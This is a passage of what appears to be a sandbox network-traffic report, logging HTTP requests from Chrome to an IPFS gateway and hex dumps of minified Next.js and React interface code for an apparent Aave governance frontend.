                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 28 29 2c 70 3d 75 2e 64 61 74 61 2c 68 3d 75 2e 69 73 46 65 74 63 68 69 6e 67 2c 78 3d 75 2e 66 65 74 63 68 4e 65 78 74 50 61 67 65 2c 66 3d 75 2e 68 61 73 4e 65 78 74 50 61 67 65 2c 76 3d 5b 5d 3b 72 65 74 75 72 6e 20 73 26 26 6c 2e 6c 65 6e 67 74 68 3e 30 26 26 28 76 3d 6c 29 2c 21 73 26 26 70 26 26 70 2e 70 61 67 65 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 28 74 3d 76 29 2e 70 75 73 68 2e 61 70 70 6c 79 28 74 2c 28 30 2c 4f 2e 5a 29 28 65 2e 70 72 6f 70 6f 73 61 6c 73 29 29 7d 29 29 2c 22 61 6c 6c 22 21 3d 3d 74 26 26 28 76 3d 76 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 62 61 64 67 65 53 74 61 74 65 3d 3d 3d 6e 7d 29 29 29 2c 28 30 2c 50 2e
                                                                                                                                                                                                                                                  Data Ascii: (),p=u.data,h=u.isFetching,x=u.fetchNextPage,f=u.hasNextPage,v=[];return s&&l.length>0&&(v=l),!s&&p&&p.pages.forEach((function(e){var t;return(t=v).push.apply(t,(0,O.Z)(e.proposals))})),"all"!==t&&(v=v.filter((function(e){return e.badgeState===n}))),(0,P.
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 47 72 6f 77 3a 31 2c 64 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 73 78 3a 7b 70 6c 3a 7b 78 73 3a 30 2c 6c 67 3a 31 38 7d 2c 6d 74 3a 7b 78 73 3a 37 2c 6c 67 3a 30 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 50 2e 6a 73 78 29 28 6e 65 2e 41 2c 7b 79 61 65 3a 21 30 2c 70 65 72 63 65 6e 74 3a 30 2c 76 6f 74 65 73 3a 30 2c 73 78 3a 7b 6d 62 3a 34 7d 2c 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 2c 28 30 2c 50 2e 6a 73 78 29 28 6e 65 2e 41 2c 7b 70 65 72 63 65 6e 74 3a 30 2c 76 6f 74 65 73 3a 30 2c 6c 6f 61 64 69 6e 67 3a 21 30 7d 29 5d 7d 29 5d 7d 29 7d 2c 61 65 3d 72 28 33 37 36 35 29 2c 6c 65 3d 72 28 34 34 33 37 33 29 3b 76 61 72 20 63 65 3d 28 30 2c 72 28 36 31 33 35 34 29
                                                                                                                                                                                                                                                  Data Ascii: Grow:1,direction:"column",justifyContent:"center",sx:{pl:{xs:0,lg:18},mt:{xs:7,lg:0}},children:[(0,P.jsx)(ne.A,{yae:!0,percent:0,votes:0,sx:{mb:4},loading:!0}),(0,P.jsx)(ne.A,{percent:0,votes:0,loading:!0})]})]})},ae=r(3765),le=r(44373);var ce=(0,r(61354)
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 2e 6a 73 78 29 28 66 65 2e 4d 2c 7b 61 76 61 74 61 72 50 72 6f 70 73 3a 7b 73 69 7a 65 3a 75 65 2e 44 2e 58 53 7d 2c 74 69 74 6c 65 50 72 6f 70 73 3a 7b 76 61 72 69 61 6e 74 3a 22 73 75 62 68 65 61 64 65 72 31 22 7d 2c 61 64 64 72 65 73 73 3a 6f 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 50 2e 6a 73 78 73 29 28 63 65 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 67 61 70 3a 32 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 50 2e 6a 73 78 29 28 78 65 2e 54 31 2c 7b 73 79 6d 62 6f 6c 3a 22 41 41 56 45 22 2c 73 78 3a 7b 77 69 64 74 68 3a 31 36 2c 68 65 69 67 68 74 3a 31 36 7d 7d 29 2c 28 30 2c 50 2e 6a 73 78 29 28 70 65 2e 42 2c 7b 76 61 6c 75 65 3a 74 2c 76 61 72 69 61 6e 74 3a 22
                                                                                                                                                                                                                                                  Data Ascii: .jsx)(fe.M,{avatarProps:{size:ue.D.XS},titleProps:{variant:"subheader1"},address:o}),children:(0,P.jsxs)(ce,{sx:{display:"flex",gap:2,alignItems:"center"},children:[(0,P.jsx)(xe.T1,{symbol:"AAVE",sx:{width:16,height:16}}),(0,P.jsx)(pe.B,{value:t,variant:"


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  119192.168.2.549844209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC504OUTGET /_next/static/chunks/9421.b5ce6bd95a5baa0f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1354INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 35657
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihyjaykclbgp7t6ogtsyc53a2rini65llbzecqqqunoj3ozok7o3i"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9421.b5ce6bd95a5baa0f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihyjaykclbgp7t6ogtsyc53a2rini65llbzecqqqunoj3ozok7o3i
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 3
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 34 36 65 63 33 34 32 38 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4746ec34289-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1310INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 34 32 31 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 61 3d 72 28 6e 28 36 34 39 33 38 29 29 2c 6f 3d 6e 28 38 35 38 39 33 29 2c 73 3d 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 6f 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9421],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var a=r(n(64938)),o=n(85893),s=(0,a.default)((0,o.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 69 29 3b 72 65 74 75 72 6e 28 30 2c 73 2e 6a 73 78 73 29 28 6f 2e 5a 2c 6c 28 6c 28 7b 73 78 3a 6c 28 7b 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 73 74 72 6f 6b 65 3a 22 23 41 35 41 38 42 36 22 7d 2c 74 29 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 31 20 31 39 22 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 57 61 6c 6c 65 74 22 7d 2c 6e 29 2c 7b 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 73 29 28 22 67 22 2c 7b 63 6c 69 70 50 61 74 68 3a 22 75 72 6c 28 23 63 6c 69 70 30 5f 33 37 31 39 5f 33 33 32 33 29 22 2c 73 74 72 6f 6b 65 57 69 64 74 68 3a 22 32 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 73 2e 6a 73 78 29 28 22 70 61 74 68 22 2c
                                                                                                                                                                                                                                                  Data Ascii: i);return(0,s.jsxs)(o.Z,l(l({sx:l({fill:"none",stroke:"#A5A8B6"},t),viewBox:"0 0 21 19",xmlns:"http://www.w3.org/2000/svg","aria-label":"Wallet"},n),{},{children:[(0,s.jsxs)("g",{clipPath:"url(#clip0_3719_3323)",strokeWidth:"2",children:[(0,s.jsx)("path",
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 31 30 31 35 20 30 2e 39 38 39 30 30 39 20 31 33 2e 38 30 35 33 20 31 2e 30 36 37 39 33 4c 32 2e 38 30 35 33 31 20 34 2e 30 30 30 39 33 43 32 2e 33 37 39 33 37 20 34 2e 31 31 34 34 34 20 32 2e 30 30 32 38 35 20 34 2e 33 36 35 34 39 20 31 2e 37 33 34 33 20 34 2e 37 31 35 30 36 43 31 2e 34 36 35 37 35 20 35 2e 30 36 34 36 32 20 31 2e 33 32 30 32 31 20 35 2e 34 39 33 31 32 20 31 2e 33 32 30 33 31 20 35 2e 39 33 33 39 33 56 36 2e 33 39 37 39 33 22 7d 29 5d 7d 29 2c 28 30 2c 73 2e 6a 73 78 29 28 22 64 65 66 73 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 22 63 6c 69 70 50 61 74 68 22 2c 7b 69 64 3a 22 63 6c 69 70 30 5f 33 37 31 39 5f 33 33 32 33 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 73 2e 6a 73 78 29 28 22 72 65 63 74 22 2c 7b 77 69 64
                                                                                                                                                                                                                                                  Data Ascii: 1015 0.989009 13.8053 1.06793L2.80531 4.00093C2.37937 4.11444 2.00285 4.36549 1.7343 4.71506C1.46575 5.06462 1.32021 5.49312 1.32031 5.93393V6.39793"})]}),(0,s.jsx)("defs",{children:(0,s.jsx)("clipPath",{id:"clip0_3719_3323",children:(0,s.jsx)("rect",{wid
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 6c 69 70 62 6f 61 72 64 2e 77 72 69 74 65 54 65 78 74 28 74 2e 72 61 77 45 72 72 6f 72 2e 6d 65 73 73 61 67 65 2e 74 6f 53 74 72 69 6e 67 28 29 29 7d 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 73 78 3a 7b 6d 74 3a 36 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 76 2e 6a 73 78 29 28 72 2e 63 43 2c 7b 69 64 3a 22 43 6f 70 79 20 65 72 72 6f 72 20 74 65 78 74 22 7d 29 2c 28 30 2c 76 2e 6a 73 78 29 28 69 2e 5a 2c 7b 73 78 3a 7b 6d 6c 3a 2e 35 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 6f 2e 5a 2c 7b 7d 29 7d 29 5d 7d 29 5d 7d 29 2c 28 30 2c 76 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e
                                                                                                                                                                                                                                                  Data Ascii: lipboard.writeText(t.rawError.message.toString())},size:"small",sx:{mt:6},children:[(0,v.jsx)(r.cC,{id:"Copy error text"}),(0,v.jsx)(i.Z,{sx:{ml:.5,fontSize:"12px"},children:(0,v.jsx)(o.Z,{})})]})]}),(0,v.jsx)(s.Z,{sx:{display:"flex",flexDirection:"column
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 35 30 38 34 29 2c 6c 3d 6e 28 36 37 32 39 34 29 2c 64 3d 6e 28 32 39 30 30 32 29 2c 75 3d 6e 28 34 31 30 32 34 29 2c 76 3d 6e 28 37 32 36 36 37 29 2c 70 3d 6e 28 37 37 35 33 37 29 2c 67 3d 6e 28 35 35 32 30 30 29 2c 78 3d 6e 28 38 35 38 39 33 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 74 78 48 61 73 68 2c 6e 3d 65 2e 61 63 74 69 6f 6e 2c 66 3d 65 2e 61 6d 6f 75 6e 74 2c 68 3d 65 2e 73 79 6d 62 6f 6c 2c 6d 3d 65 2e 63 6f 6c 6c 61 74 65 72 61 6c 2c 79 3d 65 2e 72 61 74 65 2c 62 3d 65 2e 61 64 64 54 6f 6b 65 6e 2c 41 3d 65 2e 63 75 73 74 6f 6d 41 63 74 69 6f 6e 2c 6a 3d 65 2e 63 75 73 74 6f 6d 54 65 78 74 2c 6b 3d 28 30 2c 70 2e 5a 29 28 29 2e 61 64 64 45 52 43 32 30 54 6f 6b 65 6e 2c 77 3d 28 30 2c 6c 2e 75 73 65 53 74 61 74 65
                                                                                                                                                                                                                                                  Data Ascii: 5084),l=n(67294),d=n(29002),u=n(41024),v=n(72667),p=n(77537),g=n(55200),x=n(85893),f=function(e){var t=e.txHash,n=e.action,f=e.amount,h=e.symbol,m=e.collateral,y=e.rate,b=e.addToken,A=e.customAction,j=e.customText,k=(0,p.Z)().addERC20Token,w=(0,l.useState
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 78 3a 22 32 34 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 2e 6a 73 78 29 28 72 2e 63 43 2c 7b 69 64 3a 22 41 64 64 20 7b 30 7d 20 74 6f 20 77 61 6c 6c 65 74 20 74 6f 20 74 72 61 63 6b 20 79 6f 75 72 20 62 61 6c 61 6e 63 65 2e 22 2c 76 61 6c 75 65 73 3a 7b 30 3a 62 26 26 62 2e 61 54 6f 6b 65 6e 3f 22 61 54 6f 6b 65 6e 20 22 3a 22 74 6f 6b 65 6e 20 22 7d 7d 29 7d 29 2c 28 30 2c 78 2e 6a 73 78 73 29 28 63 2e 5a 2c 7b 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6b 28 7b 61 64 64 72 65 73 73 3a 62 2e 61 64 64 72 65 73 73 2c 64 65 63 69 6d 61 6c 73 3a 62 2e 64 65 63 69 6d 61 6c 73 2c 73 79 6d 62 6f 6c 3a 62 2e 61 54 6f 6b 65 6e 3f 22 22 3a 62 2e 73 79 6d 62 6f 6c 2c 69 6d 61 67 65 3a 2f 5f 2f 2e 74 65 73 74 28 62 2e 73 79 6d 62 6f 6c 29
                                                                                                                                                                                                                                                  Data Ascii: x:"24px"},children:(0,x.jsx)(r.cC,{id:"Add {0} to wallet to track your balance.",values:{0:b&&b.aToken?"aToken ":"token "}})}),(0,x.jsxs)(c.Z,{onClick:function(){k({address:b.address,decimals:b.decimals,symbol:b.aToken?"":b.symbol,image:/_/.test(b.symbol)
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 74 2c 6e 2e 72 6f 77 26 26 74 2e 72 6f 77 5d 7d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 7d 29 3d 3e 28 30 2c 44 2e 5a 29 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 66 6c 65 78 57 72 61 70 3a 22 77 72 61 70 22 7d 2c 65 2e 72 6f 77 26 26 7b 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 72 6f 77 22 7d 29 29 29 3b 76 61 72 20 46 3d 72 2e 66 6f 72 77 61 72 64 52 65 66 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 28 30 2c 56 2e 5a 29 28 7b 70 72 6f 70 73 3a 65 2c 6e 61 6d 65 3a 22 4d 75 69 46 6f 72 6d 47 72 6f 75 70 22 7d 29 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 72 2c 72 6f 77 3a 61 3d 21 31 7d 3d 6e 2c 6f 3d 28 30 2c 50 2e 5a 29 28 6e 2c 47 29 2c
                                                                                                                                                                                                                                                  Data Ascii: t,n.row&&t.row]}})((({ownerState:e})=>(0,D.Z)({display:"flex",flexDirection:"column",flexWrap:"wrap"},e.row&&{flexDirection:"row"})));var F=r.forwardRef((function(e,t){const n=(0,V.Z)({props:e,name:"MuiFormGroup"}),{className:r,row:a=!1}=n,o=(0,P.Z)(n,G),
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 20 32 20 36 2e 34 38 20 32 20 31 32 73 34 2e 34 38 20 31 30 20 31 30 20 31 30 20 31 30 2d 34 2e 34 38 20 31 30 2d 31 30 53 31 37 2e 35 32 20 32 20 31 32 20 32 7a 6d 30 20 31 38 63 2d 34 2e 34 32 20 30 2d 38 2d 33 2e 35 38 2d 38 2d 38 73 33 2e 35 38 2d 38 20 38 2d 38 20 38 20 33 2e 35 38 20 38 20 38 2d 33 2e 35 38 20 38 2d 38 20 38 7a 22 7d 29 2c 22 52 61 64 69 6f 42 75 74 74 6f 6e 55 6e 63 68 65 63 6b 65 64 22 29 2c 6e 65 3d 28 30 2c 65 65 2e 5a 29 28 28 30 2c 5f 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 38 2e 34 36 35 20 38 2e 34 36 35 43 39 2e 33 37 20 37 2e 35 36 20 31 30 2e 36 32 20 37 20 31 32 20 37 43 31 34 2e 37 36 20 37 20 31 37 20 39 2e 32 34 20 31 37 20 31 32 43 31 37 20 31 33 2e 33 38 20 31 36 2e 34 34 20 31 34 2e 36 33 20 31 35 2e
                                                                                                                                                                                                                                                  Data Ascii: 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm0 18c-4.42 0-8-3.58-8-8s3.58-8 8-8 8 3.58 8 8-3.58 8-8 8z"}),"RadioButtonUnchecked"),ne=(0,ee.Z)((0,_.jsx)("path",{d:"M8.465 8.465C9.37 7.56 10.62 7 12 7C14.76 7 17 9.24 17 12C17 13.38 16.44 14.63 15.
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 61 73 73 4e 61 6d 65 22 5d 2c 76 65 3d 28 30 2c 49 2e 5a 50 29 28 58 2e 5a 2c 7b 73 68 6f 75 6c 64 46 6f 72 77 61 72 64 50 72 6f 70 3a 65 3d 3e 28 30 2c 49 2e 46 4f 29 28 65 29 7c 7c 22 63 6c 61 73 73 65 73 22 3d 3d 3d 65 2c 6e 61 6d 65 3a 22 4d 75 69 52 61 64 69 6f 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 7b 63 6f 6e 73 74 7b 6f 77 6e 65 72 53 74 61 74 65 3a 6e 7d 3d 65 3b 72 65 74 75 72 6e 5b 74 2e 72 6f 6f 74 2c 74 5b 60 63 6f 6c 6f 72 24 7b 28 30 2c 69 65 2e 5a 29 28 6e 2e 63 6f 6c 6f 72 29 7d 60 5d 5d 7d 7d 29 28 28 28 7b 74 68 65 6d 65 3a 65 2c 6f 77 6e 65 72 53 74 61 74 65 3a 74 7d 29 3d 3e 28 30 2c 44 2e 5a 29 28 7b 63 6f 6c 6f 72 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70
                                                                                                                                                                                                                                                  Data Ascii: assName"],ve=(0,I.ZP)(X.Z,{shouldForwardProp:e=>(0,I.FO)(e)||"classes"===e,name:"MuiRadio",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:n}=e;return[t.root,t[`color${(0,ie.Z)(n.color)}`]]}})((({theme:e,ownerState:t})=>(0,D.Z)({color:(e.vars||e).p


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  120192.168.2.549845209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC503OUTGET /_next/static/chunks/503.5217c75933b76bbc.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1353INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:57 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 22367
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigoqyhv6irkfs37fyxsddn3vo46xfk4wuy2fm62zh3kb4yd72av2y"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/503.5217c75933b76bbc.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigoqyhv6irkfs37fyxsddn3vo46xfk4wuy2fm62zh3kb4yd72av2y
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-09
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 3
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 37 34 62 38 35 63 34 32 35 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e474b85c4257-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:57 UTC1369INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 30 33 5d 2c 7b 32 31 33 38 36 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 74 29 7b 76 61 72 20 6e 3d 74 28 36 34 38 33 36 29 3b 72 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 74 28 36 34 39 33 38 29 29 2c 61 3d 74 28 38 35 38 39 33 29 2c 69 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 39 20 31 36 2e 31 37 20 35 2e 35 33 20 31 32 2e 37 61 2e 39 39 35 39 2e 39 39 35 39 20 30 20 30 20 30 2d 31 2e 34 31 20 30 63 2d 2e 33 39 2e 33 39 2d 2e 33 39 20 31 2e 30 32 20 30 20 31 2e 34
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[503],{21386:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),a=t(85893),i=(0,o.default)((0,a.jsx)("path",{d:"M9 16.17 5.53 12.7a.9959.9959 0 0 0-1.41 0c-.39.39-.39 1.02 0 1.4
